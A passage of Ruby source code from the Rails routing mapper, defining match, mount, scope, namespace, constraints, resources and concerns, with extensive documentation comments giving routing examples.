# Points to a +Rack+ endpoint. Can be an object that responds to
# +call+ or a string representing a controller's action.
#
# match 'path', to: 'controller#action', via: :get
# match 'path', to: -> (env) { [200, {}, ["Success!"]] }, via: :get
# match 'path', to: RackApp, via: :get
#
# [:on]
# Shorthand for wrapping routes in a specific RESTful context. Valid
# values are +:member+, +:collection+, and +:new+. Only use within
# <tt>resource(s)</tt> block. For example:
#
# resource :bar do
# match 'foo', to: 'c#a', on: :member, via: [:get, :post]
# end
#
# Is equivalent to:
#
# resource :bar do
# member do
# match 'foo', to: 'c#a', via: [:get, :post]
# end
# end
#
# [:constraints]
# Constrains parameters with a hash of regular expressions
# or an object that responds to <tt>matches?</tt>. In addition, constraints
# other than path can also be specified with any object
# that responds to <tt>===</tt> (eg. String, Array, Range, etc.).
#
# match 'path/:id', constraints: { id: /[A-Z]\d{5}/ }, via: :get
#
# match 'json_only', constraints: { format: 'json' }, via: :get
#
# class Whitelist
# def matches?(request) request.remote_ip == '1.2.3.4' end
# end
# match 'path', to: 'c#a', constraints: Whitelist.new, via: :get
#
# See <tt>Scoping#constraints</tt> for more examples with its scope
# equivalent.
#
# [:defaults]
# Sets defaults for parameters
#
# # Sets params[:format] to 'jpg' by default
# match 'path', to: 'c#a', defaults: { format: 'jpg' }, via: :get
#
# See <tt>Scoping#defaults</tt> for its scope equivalent.
#
# [:anchor]
# Boolean to anchor a <tt>match</tt> pattern. Default is true. When set to
# false, the pattern matches any request prefixed with the given path.
#
# # Matches any request starting with 'path'
# match 'path', to: 'c#a', anchor: false, via: :get
#
# [:format]
# Allows you to specify the default value for optional +format+
# segment or disable it by supplying +false+.
def match(path, options = nil)
end
# Mount a Rack-based application to be used within the application.
#
# mount SomeRackApp, at: "some_route"
#
# Alternatively:
#
# mount(SomeRackApp => "some_route")
#
# For options, see +match+, as +mount+ uses it internally.
#
# All mounted applications come with routing helpers to access them.
# These are named after the class specified, so for the above example
# the helper is either +some_rack_app_path+ or +some_rack_app_url+.
# To customize this helper's name, use the +:as+ option:
#
# mount(SomeRackApp => "some_route", as: "exciting")
#
# This will generate the +exciting_path+ and +exciting_url+ helpers
# which can be used to navigate to this mounted app.
def mount(app, options = nil)
if options
path = options.delete(:at)
elsif Hash === app
options = app
app, path = options.find { |k, _| k.respond_to?(:call) }
options.delete(app) if app
end
raise ArgumentError, "A rack application must be specified" unless app.respond_to?(:call)
raise ArgumentError, <<~MSG unless path
Must be called with mount point
mount SomeRackApp, at: "some_route"
or
mount(SomeRackApp => "some_route")
MSG
rails_app = rails_app? app
options[:as] ||= app_name(app, rails_app)
target_as = name_for_action(options[:as], path)
options[:via] ||= :all
match(path, options.merge(to: app, anchor: false, format: false))
define_generate_prefix(app, target_as) if rails_app
self
end
def default_url_options=(options)
@set.default_url_options = options
end
alias_method :default_url_options, :default_url_options=
def with_default_scope(scope, &block)
scope(scope) do
instance_exec(&block)
end
end
# Query if the following named route was already defined.
def has_named_route?(name)
@set.named_routes.key? name
end
private
def rails_app?(app)
app.is_a?(Class) && app < Rails::Railtie
end
def app_name(app, rails_app)
if rails_app
app.railtie_name
elsif app.is_a?(Class)
class_name = app.name
ActiveSupport::Inflector.underscore(class_name).tr("/", "_")
end
end
def define_generate_prefix(app, name)
_route = @set.named_routes.get name
_routes = @set
_url_helpers = @set.url_helpers
script_namer = ->(options) do
prefix_options = options.slice(*_route.segment_keys)
prefix_options[:relative_url_root] = "".freeze
if options[:_recall]
prefix_options.reverse_merge!(options[:_recall].slice(*_route.segment_keys))
end
# We must actually delete prefix segment keys to avoid passing them to next url_for.
_route.segment_keys.each { |k| options.delete(k) }
_url_helpers.send("#{name}_path", prefix_options)
end
app.routes.define_mounted_helper(name, script_namer)
app.routes.extend Module.new {
def optimize_routes_generation?; false; end
define_method :find_script_name do |options|
if options.key? :script_name
super(options)
else
script_namer.call(options)
end
end
}
end
end
module HttpHelpers
# Define a route that only recognizes HTTP GET.
# For supported arguments, see match[rdoc-ref:Base#match]
#
# get 'bacon', to: 'food#bacon'
def get(*args, &block)
map_method(:get, args, &block)
end
# Define a route that only recognizes HTTP POST.
# For supported arguments, see match[rdoc-ref:Base#match]
#
# post 'bacon', to: 'food#bacon'
def post(*args, &block)
map_method(:post, args, &block)
end
# Define a route that only recognizes HTTP PATCH.
# For supported arguments, see match[rdoc-ref:Base#match]
#
# patch 'bacon', to: 'food#bacon'
def patch(*args, &block)
map_method(:patch, args, &block)
end
# Define a route that only recognizes HTTP PUT.
# For supported arguments, see match[rdoc-ref:Base#match]
#
# put 'bacon', to: 'food#bacon'
def put(*args, &block)
map_method(:put, args, &block)
end
# Define a route that only recognizes HTTP DELETE.
# For supported arguments, see match[rdoc-ref:Base#match]
#
# delete 'broccoli', to: 'food#broccoli'
def delete(*args, &block)
map_method(:delete, args, &block)
end
private
def map_method(method, args, &block)
options = args.extract_options!
options[:via] = method
match(*args, options, &block)
self
end
end
# You may wish to organize groups of controllers under a namespace.
# Most commonly, you might group a number of administrative controllers
# under an +admin+ namespace. You would place these controllers under
# the <tt>app/controllers/admin</tt> directory, and you can group them
# together in your router:
#
# namespace "admin" do
# resources :posts, :comments
# end
#
# This will create a number of routes for each of the posts and comments
# controller. For <tt>Admin::PostsController</tt>, Rails will create:
#
# GET /admin/posts
# GET /admin/posts/new
# POST /admin/posts
# GET /admin/posts/1
# GET /admin/posts/1/edit
# PATCH/PUT /admin/posts/1
# DELETE /admin/posts/1
#
# If you want to route /posts (without the prefix /admin) to
# <tt>Admin::PostsController</tt>, you could use
#
# scope module: "admin" do
# resources :posts
# end
#
# or, for a single case
#
# resources :posts, module: "admin"
#
# If you want to route /admin/posts to +PostsController+
# (without the <tt>Admin::</tt> module prefix), you could use
#
# scope "/admin" do
# resources :posts
# end
#
# or, for a single case
#
# resources :posts, path: "/admin/posts"
#
# In each of these cases, the named routes remain the same as if you did
# not use scope. In the last case, the following paths map to
# +PostsController+:
#
# GET /admin/posts
# GET /admin/posts/new
# POST /admin/posts
# GET /admin/posts/1
# GET /admin/posts/1/edit
# PATCH/PUT /admin/posts/1
# DELETE /admin/posts/1
module Scoping
# Scopes a set of routes to the given default options.
#
# Take the following route definition as an example:
#
# scope path: ":account_id", as: "account" do
# resources :projects
# end
#
# This generates helpers such as +account_projects_path+, just like +resources+ does.
# The difference here being that the routes generated are like /:account_id/projects,
# rather than /accounts/:account_id/projects.
#
# === Options
#
# Takes same options as <tt>Base#match</tt> and <tt>Resources#resources</tt>.
#
# # route /posts (without the prefix /admin) to <tt>Admin::PostsController</tt>
# scope module: "admin" do
# resources :posts
# end
#
# # prefix the posts resource's requests with '/admin'
# scope path: "/admin" do
# resources :posts
# end
#
# # prefix the routing helper name: +sekret_posts_path+ instead of +posts_path+
# scope as: "sekret" do
# resources :posts
# end
def scope(*args)
options = args.extract_options!.dup
scope = {}
options[:path] = args.flatten.join("/") if args.any?
options[:constraints] ||= {}
unless nested_scope?
options[:shallow_path] ||= options[:path] if options.key?(:path)
options[:shallow_prefix] ||= options[:as] if options.key?(:as)
end
if options[:constraints].is_a?(Hash)
defaults = options[:constraints].select do |k, v|
URL_OPTIONS.include?(k) && (v.is_a?(String) || v.is_a?(Integer))
end
options[:defaults] = defaults.merge(options[:defaults] || {})
else
block, options[:constraints] = options[:constraints], {}
end
if options.key?(:only) || options.key?(:except)
scope[:action_options] = { only: options.delete(:only),
except: options.delete(:except) }
end
if options.key? :anchor
raise ArgumentError, "anchor is ignored unless passed to `match`"
end
@scope.options.each do |option|
if option == :blocks
value = block
elsif option == :options
value = options
else
value = options.delete(option) { POISON }
end
unless POISON == value
scope[option] = send("merge_#{option}_scope", @scope[option], value)
end
end
@scope = @scope.new scope
yield
self
ensure
@scope = @scope.parent
end
POISON = Object.new # :nodoc:
# Scopes routes to a specific controller
#
# controller "food" do
# match "bacon", action: :bacon, via: :get
# end
def controller(controller)
@scope = @scope.new(controller: controller)
yield
ensure
@scope = @scope.parent
end
# Scopes routes to a specific namespace. For example:
#
# namespace :admin do
# resources :posts
# end
#
# This generates the following routes:
#
# admin_posts GET /admin/posts(.:format) admin/posts#index
# admin_posts POST /admin/posts(.:format) admin/posts#create
# new_admin_post GET /admin/posts/new(.:format) admin/posts#new
# edit_admin_post GET /admin/posts/:id/edit(.:format) admin/posts#edit
# admin_post GET /admin/posts/:id(.:format) admin/posts#show
# admin_post PATCH/PUT /admin/posts/:id(.:format) admin/posts#update
# admin_post DELETE /admin/posts/:id(.:format) admin/posts#destroy
#
# === Options
#
# The +:path+, +:as+, +:module+, +:shallow_path+ and +:shallow_prefix+
# options all default to the name of the namespace.
#
# For options, see <tt>Base#match</tt>. For +:shallow_path+ option, see
# <tt>Resources#resources</tt>.
#
# # accessible through /sekret/posts rather than /admin/posts
# namespace :admin, path: "sekret" do
# resources :posts
# end
#
# # maps to <tt>Sekret::PostsController</tt> rather than <tt>Admin::PostsController</tt>
# namespace :admin, module: "sekret" do
# resources :posts
# end
#
# # generates +sekret_posts_path+ rather than +admin_posts_path+
# namespace :admin, as: "sekret" do
# resources :posts
# end
def namespace(path, options = {})
path = path.to_s
defaults = {
module: path,
as: options.fetch(:as, path),
shallow_path: options.fetch(:path, path),
shallow_prefix: options.fetch(:as, path)
}
path_scope(options.delete(:path) { path }) do
scope(defaults.merge!(options)) { yield }
end
end
# === Parameter Restriction
# Allows you to constrain the nested routes based on a set of rules.
# For instance, in order to change the routes to allow for a dot character in the +id+ parameter:
#
# constraints(id: /\d+\.\d+/) do
# resources :posts
# end
#
# Now routes such as +/posts/1+ will no longer be valid, but +/posts/1.1+ will be.
# The +id+ parameter must match the constraint passed in for this example.
#
# You may use this to also restrict other parameters:
#
# resources :posts do
# constraints(post_id: /\d+\.\d+/) do
# resources :comments
# end
# end
#
# === Restricting based on IP
#
# Routes can also be constrained to an IP or a certain range of IP addresses:
#
# constraints(ip: /192\.168\.\d+\.\d+/) do
# resources :posts
# end
#
# Any user connecting from the 192.168.* range will be able to see this resource,
# where as any user connecting outside of this range will be told there is no such route.
#
# === Dynamic request matching
#
# Requests to routes can be constrained based on specific criteria:
#
# constraints(-> (req) { req.env["HTTP_USER_AGENT"] =~ /iPhone/ }) do
# resources :iphones
# end
#
# You are able to move this logic out into a class if it is too complex for routes.
# This class must have a +matches?+ method defined on it which either returns +true+
# if the user should be given access to that route, or +false+ if the user should not.
#
# class Iphone
# def self.matches?(request)
# request.env["HTTP_USER_AGENT"] =~ /iPhone/
# end
# end
#
# An expected place for this code would be +lib/constraints+.
#
# This class is then used like this:
#
# constraints(Iphone) do
# resources :iphones
# end
def constraints(constraints = {})
scope(constraints: constraints) { yield }
end
# Allows you to set default parameters for a route, such as this:
# defaults id: 'home' do
# match 'scoped_pages/(:id)', to: 'pages#show'
# end
# Using this, the +:id+ parameter here will default to 'home'.
def defaults(defaults = {})
@scope = @scope.new(defaults: merge_defaults_scope(@scope[:defaults], defaults))
yield
ensure
@scope = @scope.parent
end
private
def merge_path_scope(parent, child)
Mapper.normalize_path("#{parent}/#{child}")
end
def merge_shallow_path_scope(parent, child)
Mapper.normalize_path("#{parent}/#{child}")
end
def merge_as_scope(parent, child)
parent ? "#{parent}_#{child}" : child
end
def merge_shallow_prefix_scope(parent, child)
parent ? "#{parent}_#{child}" : child
end
def merge_module_scope(parent, child)
parent ? "#{parent}/#{child}" : child
end
def merge_controller_scope(parent, child)
child
end
def merge_action_scope(parent, child)
child
end
def merge_via_scope(parent, child)
child
end
def merge_format_scope(parent, child)
child
end
def merge_path_names_scope(parent, child)
merge_options_scope(parent, child)
end
def merge_constraints_scope(parent, child)
merge_options_scope(parent, child)
end
def merge_defaults_scope(parent, child)
merge_options_scope(parent, child)
end
def merge_blocks_scope(parent, child)
merged = parent ? parent.dup : []
merged << child if child
merged
end
def merge_options_scope(parent, child)
(parent || {}).merge(child)
end
def merge_shallow_scope(parent, child)
child ? true : false
end
def merge_to_scope(parent, child)
child
end
end
# Resource routing allows you to quickly declare all of the common routes
# for a given resourceful controller. Instead of declaring separate routes
# for your +index+, +show+, +new+, +edit+, +create+, +update+ and +destroy+
# actions, a resourceful route declares them in a single line of code:
#
# resources :photos
#
# Sometimes, you have a resource that clients always look up without
# referencing an ID. A common example, /profile always shows the profile of
# the currently logged in user. In this case, you can use a singular resource
# to map /profile (rather than /profile/:id) to the show action.
#
# resource :profile
#
# It's common to have resources that are logically children of other
# resources:
#
# resources :magazines do
# resources :ads
# end
#
# You may wish to organize groups of controllers under a namespace. Most
# commonly, you might group a number of administrative controllers under
# an +admin+ namespace. You would place these controllers under the
# <tt>app/controllers/admin</tt> directory, and you can group them together
# in your router:
#
# namespace "admin" do
# resources :posts, :comments
# end
#
# By default the +:id+ parameter doesn't accept dots. If you need to
# use dots as part of the +:id+ parameter add a constraint which
# overrides this restriction, e.g:
#
# resources :articles, id: /[^\/]+/
#
# This allows any character other than a slash as part of your +:id+.
#
module Resources
# CANONICAL_ACTIONS holds all actions that does not need a prefix or
# a path appended since they fit properly in their scope level.
VALID_ON_OPTIONS = [:new, :collection, :member]
RESOURCE_OPTIONS = [:as, :controller, :path, :only, :except, :param, :concerns]
CANONICAL_ACTIONS = %w(index create new show update destroy)
class Resource #:nodoc:
attr_reader :controller, :path, :param
def initialize(entities, api_only, shallow, options = {})
@name = entities.to_s
@path = (options[:path] || @name).to_s
@controller = (options[:controller] || @name).to_s
@as = options[:as]
@param = (options[:param] || :id).to_sym
@options = options
@shallow = shallow
@api_only = api_only
@only = options.delete :only
@except = options.delete :except
end
def default_actions
if @api_only
[:index, :create, :show, :update, :destroy]
else
[:index, :create, :new, :show, :update, :destroy, :edit]
end
end
def actions
if @only
Array(@only).map(&:to_sym)
elsif @except
default_actions - Array(@except).map(&:to_sym)
else
default_actions
end
end
def name
@as || @name
end
def plural
@plural ||= name.to_s
end
def singular
@singular ||= name.to_s.singularize
end
alias :member_name :singular
# Checks for uncountable plurals, and appends "_index" if the plural
# and singular form are the same.
def collection_name
singular == plural ? "#{plural}_index" : plural
end
def resource_scope
controller
end
alias :collection_scope :path
def member_scope
"#{path}/:#{param}"
end
alias :shallow_scope :member_scope
def new_scope(new_path)
"#{path}/#{new_path}"
end
def nested_param
:"#{singular}_#{param}"
end
def nested_scope
"#{path}/:#{nested_param}"
end
def shallow?
@shallow
end
def singleton?; false; end
end
class SingletonResource < Resource #:nodoc:
def initialize(entities, api_only, shallow, options)
super
@as = nil
@controller = (options[:controller] || plural).to_s
@as = options[:as]
end
def default_actions
if @api_only
[:show, :create, :update, :destroy]
else
[:show, :create, :update, :destroy, :new, :edit]
end
end
def plural
@plural ||= name.to_s.pluralize
end
def singular
@singular ||= name.to_s
end
alias :member_name :singular
alias :collection_name :singular
alias :member_scope :path
alias :nested_scope :path
def singleton?; true; end
end
def resources_path_names(options)
@scope[:path_names].merge!(options)
end
# Sometimes, you have a resource that clients always look up without
# referencing an ID. A common example, /profile always shows the
# profile of the currently logged in user. In this case, you can use
# a singular resource to map /profile (rather than /profile/:id) to
# the show action:
#
# resource :profile
#
# This creates six different routes in your application, all mapping to
# the +Profiles+ controller (note that the controller is named after
# the plural):
#
# GET /profile/new
# GET /profile
# GET /profile/edit
# PATCH/PUT /profile
# DELETE /profile
# POST /profile
#
# === Options
# Takes same options as resources[rdoc-ref:#resources]
def resource(*resources, &block)
options = resources.extract_options!.dup
if apply_common_behavior_for(:resource, resources, options, &block)
return self
end
with_scope_level(:resource) do
options = apply_action_options options
resource_scope(SingletonResource.new(resources.pop, api_only?, @scope[:shallow], options)) do
yield if block_given?
concerns(options[:concerns]) if options[:concerns]
new do
get :new
end if parent_resource.actions.include?(:new)
set_member_mappings_for_resource
collection do
post :create
end if parent_resource.actions.include?(:create)
end
end
self
end
# In Rails, a resourceful route provides a mapping between HTTP verbs
# and URLs and controller actions. By convention, each action also maps
# to particular CRUD operations in a database. A single entry in the
# routing file, such as
#
# resources :photos
#
# creates seven different routes in your application, all mapping to
# the +Photos+ controller:
#
# GET /photos
# GET /photos/new
# POST /photos
# GET /photos/:id
# GET /photos/:id/edit
# PATCH/PUT /photos/:id
# DELETE /photos/:id
#
# Resources can also be nested infinitely by using this block syntax:
#
# resources :photos do
# resources :comments
# end
#
# This generates the following comments routes:
#
# GET /photos/:photo_id/comments
# GET /photos/:photo_id/comments/new
# POST /photos/:photo_id/comments
# GET /photos/:photo_id/comments/:id
# GET /photos/:photo_id/comments/:id/edit
# PATCH/PUT /photos/:photo_id/comments/:id
# DELETE /photos/:photo_id/comments/:id
#
# === Options
# Takes same options as match[rdoc-ref:Base#match] as well as:
#
# [:path_names]
# Allows you to change the segment component of the +edit+ and +new+ actions.
# Actions not specified are not changed.
#
# resources :posts, path_names: { new: "brand_new" }
#
# The above example will now change /posts/new to /posts/brand_new.
#
# [:path]
# Allows you to change the path prefix for the resource.
#
# resources :posts, path: 'postings'
#
# The resource and all segments will now route to /postings instead of /posts.
#
# [:only]
# Only generate routes for the given actions.
#
# resources :cows, only: :show
# resources :cows, only: [:show, :index]
#
# [:except]
# Generate all routes except for the given actions.
#
# resources :cows, except: :show
# resources :cows, except: [:show, :index]
#
# [:shallow]
# Generates shallow routes for nested resource(s). When placed on a parent resource,
# generates shallow routes for all nested resources.
#
# resources :posts, shallow: true do
# resources :comments
# end
#
# Is the same as:
#
# resources :posts do
# resources :comments, except: [:show, :edit, :update, :destroy]
# end
# resources :comments, only: [:show, :edit, :update, :destroy]
#
# This allows URLs for resources that otherwise would be deeply nested such
# as a comment on a blog post like <tt>/posts/a-long-permalink/comments/1234</tt>
# to be shortened to just <tt>/comments/1234</tt>.
#
# [:shallow_path]
# Prefixes nested shallow routes with the specified path.
#
# scope shallow_path: "sekret" do
# resources :posts do
# resources :comments, shallow: true
# end
# end
#
# The +comments+ resource here will have the following routes generated for it:
#
# post_comments GET /posts/:post_id/comments(.:format)
# post_comments POST /posts/:post_id/comments(.:format)
# new_post_comment GET /posts/:post_id/comments/new(.:format)
# edit_comment GET /sekret/comments/:id/edit(.:format)
# comment GET /sekret/comments/:id(.:format)
# comment PATCH/PUT /sekret/comments/:id(.:format)
# comment DELETE /sekret/comments/:id(.:format)
#
# [:shallow_prefix]
# Prefixes nested shallow route names with specified prefix.
#
# scope shallow_prefix: "sekret" do
# resources :posts do
# resources :comments, shallow: true
# end
# end
#
# The +comments+ resource here will have the following routes generated for it:
#
# post_comments GET /posts/:post_id/comments(.:format)
# post_comments POST /posts/:post_id/comments(.:format)
# new_post_comment GET /posts/:post_id/comments/new(.:format)
# edit_sekret_comment GET /comments/:id/edit(.:format)
# sekret_comment GET /comments/:id(.:format)
# sekret_comment PATCH/PUT /comments/:id(.:format)
# sekret_comment DELETE /comments/:id(.:format)
#
# [:format]
# Allows you to specify the default value for optional +format+
# segment or disable it by supplying +false+.
#
# === Examples
#
# # routes call <tt>Admin::PostsController</tt>
# resources :posts, module: "admin"
#
# # resource actions are at /admin/posts.
# resources :posts, path: "admin/posts"
def resources(*resources, &block)
options = resources.extract_options!.dup
if apply_common_behavior_for(:resources, resources, options, &block)
return self
end
with_scope_level(:resources) do
options = apply_action_options options
resource_scope(Resource.new(resources.pop, api_only?, @scope[:shallow], options)) do
yield if block_given?
concerns(options[:concerns]) if options[:concerns]
collection do
get :index if parent_resource.actions.include?(:index)
post :create if parent_resource.actions.include?(:create)
end
new do
get :new
end if parent_resource.actions.include?(:new)
set_member_mappings_for_resource
end
end
self
end
# To add a route to the collection:
#
# resources :photos do
# collection do
# get 'search'
# end
# end
#
# This will enable Rails to recognize paths such as <tt>/photos/search</tt>
# with GET, and route to the search action of +PhotosController+. It will also
# create the <tt>search_photos_url</tt> and <tt>search_photos_path</tt>
# route helpers.
def collection
unless resource_scope?
raise ArgumentError, "can't use collection outside resource(s) scope"
end
with_scope_level(:collection) do
path_scope(parent_resource.collection_scope) do
yield
end
end
end
# To add a member route, add a member block into the resource block:
#
# resources :photos do
# member do
# get 'preview'
# end
# end
#
# This will recognize <tt>/photos/1/preview</tt> with GET, and route to the
# preview action of +PhotosController+. It will also create the
# <tt>preview_photo_url</tt> and <tt>preview_photo_path</tt> helpers.
def member
unless resource_scope?
raise ArgumentError, "can't use member outside resource(s) scope"
end
with_scope_level(:member) do
if shallow?
shallow_scope {
path_scope(parent_resource.member_scope) { yield }
}
else
path_scope(parent_resource.member_scope) { yield }
end
end
end
def new
unless resource_scope?
raise ArgumentError, "can't use new outside resource(s) scope"
end
with_scope_level(:new) do
path_scope(parent_resource.new_scope(action_path(:new))) do
yield
end
end
end
def nested
unless resource_scope?
raise ArgumentError, "can't use nested outside resource(s) scope"
end
with_scope_level(:nested) do
if shallow? && shallow_nesting_depth >= 1
shallow_scope do
path_scope(parent_resource.nested_scope) do
scope(nested_options) { yield }
end
end
else
path_scope(parent_resource.nested_scope) do
scope(nested_options) { yield }
end
end
end
end
# See ActionDispatch::Routing::Mapper::Scoping#namespace.
def namespace(path, options = {})
if resource_scope?
nested { super }
else
super
end
end
def shallow
@scope = @scope.new(shallow: true)
yield
ensure
@scope = @scope.parent
end
def shallow?
!parent_resource.singleton? && @scope[:shallow]
end
# Matches a URL pattern to one or more routes.
# For more information, see match[rdoc-ref:Base#match].
#
# match 'path' => 'controller#action', via: :patch
# match 'path', to: 'controller#action', via: :post
# match 'path', 'otherpath', on: :member, via: :get
def match(path, *rest, &block)
if rest.empty? && Hash === path
options = path
path, to = options.find { |name, _value| name.is_a?(String) }
raise ArgumentError, "Route path not specified" if path.nil?
case to
when Symbol
options[:action] = to
when String
if /#/.match?(to)
options[:to] = to
else
options[:controller] = to
end
else
options[:to] = to
end
options.delete(path)
paths = [path]
else
options = rest.pop || {}
paths = [path] + rest
end
if options.key?(:defaults)
defaults(options.delete(:defaults)) { map_match(paths, options, &block) }
else
map_match(paths, options, &block)
end
end
# You can specify what Rails should route "/" to with the root method:
#
# root to: 'pages#main'
#
# For options, see +match+, as +root+ uses it internally.
#
# You can also pass a string which will expand
#
# root 'pages#main'
#
# You should put the root route at the top of <tt>config/routes.rb</tt>,
# because this means it will be matched first. As this is the most popular route
# of most Rails applications, this is beneficial.
def root(path, options = {})
if path.is_a?(String)
options[:to] = path
elsif path.is_a?(Hash) && options.empty?
options = path
else
raise ArgumentError, "must be called with a path and/or options"
end
if @scope.resources?
with_scope_level(:root) do
path_scope(parent_resource.path) do
match_root_route(options)
end
end
else
match_root_route(options)
end
end
private
def parent_resource
@scope[:scope_level_resource]
end
def apply_common_behavior_for(method, resources, options, &block)
if resources.length > 1
resources.each { |r| send(method, r, options, &block) }
return true
end
if options.delete(:shallow)
shallow do
send(method, resources.pop, options, &block)
end
return true
end
if resource_scope?
nested { send(method, resources.pop, options, &block) }
return true
end
options.keys.each do |k|
(options[:constraints] ||= {})[k] = options.delete(k) if options[k].is_a?(Regexp)
end
scope_options = options.slice!(*RESOURCE_OPTIONS)
unless scope_options.empty?
scope(scope_options) do
send(method, resources.pop, options, &block)
end
return true
end
false
end
def apply_action_options(options)
return options if action_options? options
options.merge scope_action_options
end
def action_options?(options)
options[:only] || options[:except]
end
def scope_action_options
@scope[:action_options] || {}
end
def resource_scope?
@scope.resource_scope?
end
def resource_method_scope?
@scope.resource_method_scope?
end
def nested_scope?
@scope.nested?
end
def with_scope_level(kind) # :doc:
@scope = @scope.new_level(kind)
yield
ensure
@scope = @scope.parent
end
def resource_scope(resource)
@scope = @scope.new(scope_level_resource: resource)
controller(resource.resource_scope) { yield }
ensure
@scope = @scope.parent
end
def nested_options
options = { as: parent_resource.member_name }
options[:constraints] = {
parent_resource.nested_param => param_constraint
} if param_constraint?
options
end
def shallow_nesting_depth
@scope.find_all { |node|
node.frame[:scope_level_resource]
}.count { |node| node.frame[:scope_level_resource].shallow? }
end
def param_constraint?
@scope[:constraints] && @scope[:constraints][parent_resource.param].is_a?(Regexp)
end
def param_constraint
@scope[:constraints][parent_resource.param]
end
def canonical_action?(action)
resource_method_scope? && CANONICAL_ACTIONS.include?(action.to_s)
end
def shallow_scope
scope = { as: @scope[:shallow_prefix],
path: @scope[:shallow_path] }
@scope = @scope.new scope
yield
ensure
@scope = @scope.parent
end
def path_for_action(action, path)
return "#{@scope[:path]}/#{path}" if path
if canonical_action?(action)
@scope[:path].to_s
else
"#{@scope[:path]}/#{action_path(action)}"
end
end
def action_path(name)
@scope[:path_names][name.to_sym] || name
end
def prefix_name_for_action(as, action)
if as
prefix = as
elsif !canonical_action?(action)
prefix = action
end
if prefix && prefix != "/" && !prefix.empty?
Mapper.normalize_name prefix.to_s.tr("-", "_")
end
end
def name_for_action(as, action)
prefix = prefix_name_for_action(as, action)
name_prefix = @scope[:as]
if parent_resource
return nil unless as || action
collection_name = parent_resource.collection_name
member_name = parent_resource.member_name
end
action_name = @scope.action_name(name_prefix, prefix, collection_name, member_name)
candidate = action_name.select(&:present?).join("_")
unless candidate.empty?
# If a name was not explicitly given, we check if it is valid
# and return nil in case it isn't. Otherwise, we pass the invalid name
# forward so the underlying router engine treats it and raises an exception.
if as.nil?
candidate unless candidate !~ /\A[_a-z]/i || has_named_route?(candidate)
else
candidate
end
end
end
def set_member_mappings_for_resource # :doc:
member do
get :edit if parent_resource.actions.include?(:edit)
get :show if parent_resource.actions.include?(:show)
if parent_resource.actions.include?(:update)
patch :update
put :update
end
delete :destroy if parent_resource.actions.include?(:destroy)
end
end
def api_only? # :doc:
@set.api_only?
end
def path_scope(path)
@scope = @scope.new(path: merge_path_scope(@scope[:path], path))
yield
ensure
@scope = @scope.parent
end
def map_match(paths, options)
if options[:on] && !VALID_ON_OPTIONS.include?(options[:on])
raise ArgumentError, "Unknown scope #{on.inspect} given to :on"
end
if @scope[:to]
options[:to] ||= @scope[:to]
end
if @scope[:controller] && @scope[:action]
options[:to] ||= "#{@scope[:controller]}##{@scope[:action]}"
end
controller = options.delete(:controller) || @scope[:controller]
option_path = options.delete :path
to = options.delete :to
via = Mapping.check_via Array(options.delete(:via) {
@scope[:via]
})
formatted = options.delete(:format) { @scope[:format] }
anchor = options.delete(:anchor) { true }
options_constraints = options.delete(:constraints) || {}
path_types = paths.group_by(&:class)
path_types.fetch(String, []).each do |_path|
route_options = options.dup
if _path && option_path
raise ArgumentError, "Ambiguous route definition. Both :path and the route path were specified as strings."
end
to = get_to_from_path(_path, to, route_options[:action])
decomposed_match(_path, controller, route_options, _path, to, via, formatted, anchor, options_constraints)
end
path_types.fetch(Symbol, []).each do |action|
route_options = options.dup
decomposed_match(action, controller, route_options, option_path, to, via, formatted, anchor, options_constraints)
end
self
end
def get_to_from_path(path, to, action)
return to if to || action
path_without_format = path.sub(/\(\.:format\)$/, "")
if using_match_shorthand?(path_without_format)
path_without_format.gsub(%r{^/}, "").sub(%r{/([^/]*)$}, '#\1').tr("-", "_")
else
nil
end
end
def using_match_shorthand?(path)
path =~ %r{^/?[-\w]+/[-\w/]+$}
end
def decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints)
if on = options.delete(:on)
send(on) { decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints) }
else
case @scope.scope_level
when :resources
nested { decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints) }
when :resource
member { decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints) }
else
add_route(path, controller, options, _path, to, via, formatted, anchor, options_constraints)
end
end
end
def add_route(action, controller, options, _path, to, via, formatted, anchor, options_constraints)
path = path_for_action(action, _path)
raise ArgumentError, "path is required" if path.blank?
action = action.to_s
default_action = options.delete(:action) || @scope[:action]
if /^[\w\-\/]+$/.match?(action)
default_action ||= action.tr("-", "_") unless action.include?("/")
else
action = nil
end
as = if !options.fetch(:as, true) # if it's set to nil or false
options.delete(:as)
else
name_for_action(options.delete(:as), action)
end
path = Mapping.normalize_path URI.parser.escape(path), formatted
ast = Journey::Parser.parse path
mapping = Mapping.build(@scope, @set, ast, controller, default_action, to, via, formatted, options_constraints, anchor, options)
@set.add_route(mapping, as)
end
def match_root_route(options)
name = has_named_route?(name_for_action(:root, nil)) ? nil : :root
args = ["/", { as: name, via: :get }.merge!(options)]
match(*args)
end
end
# Routing Concerns allow you to declare common routes that can be reused
# inside others resources and routes.
#
# concern :commentable do
# resources :comments
# end
#
# concern :image_attachable do
# resources :images, only: :index
# end
#
# These concerns are used in Resources routing:
#
# resources :messages, concerns: [:commentable, :image_attachable]
#
# or in a scope or namespace:
#
# namespace :posts do
# concerns :commentable
# end
module Concerns
# Define a routing concern using a name.
#
# Concerns may be defined inline, using a block, or handled by
# another object, by passing that object as the second parameter.
#
# The concern object, if supplied, should respond to <tt>call</tt>,
# which will receive two parameters:
#
# * The current mapper
# * A hash of options which the concern object may use
#
# Options may also be used by concerns defined in a block by accepting
# a block parameter. So, using a block, you might do something as
# simple as limit the actions available on certain resources, passing
# standard resource options through the concern:
#
# concern :commentable do |options|
# resources :comments, options
# end
#
# resources :posts, concerns: :commentable
# resources :archived_posts do
# # Don't allow comments on archived posts
# concerns :commentable, only: [:index, :show]
# end
#
# Or, using a callable object, you might implement something more
# specific to your application, which would be out of place in your
# routes file.
#
# # purchasable.rb
# class Purchasable
# def initialize(defaults = {})
# @defaults = defaults
# end
#
# def call(mapper, options = {})
# options = @defaults.merge(options)
# mapper.resources :purchases
# mapper.resources :receipts
# mapper.resources :returns if options[:returnable]
# end
# end
#
# # routes.rb
# concern :purchasable, Purchasable.new(returnable: true)
#
# resources :toys, concerns: :purchasable
# resources :electronics, concerns: :purchasable
# resources :pets do
# concerns :purchasable, returnable: false
# end
#
# Any routing helpers can be used inside a concern. If using a
# callable, they're accessible from the Mapper that's passed to
# <tt>call</tt>.
def concern(name, callable = nil, &block)
callable ||= lambda { |mapper, options| mapper.instance_exec(options, &block) }
@concerns[name] = callable
end
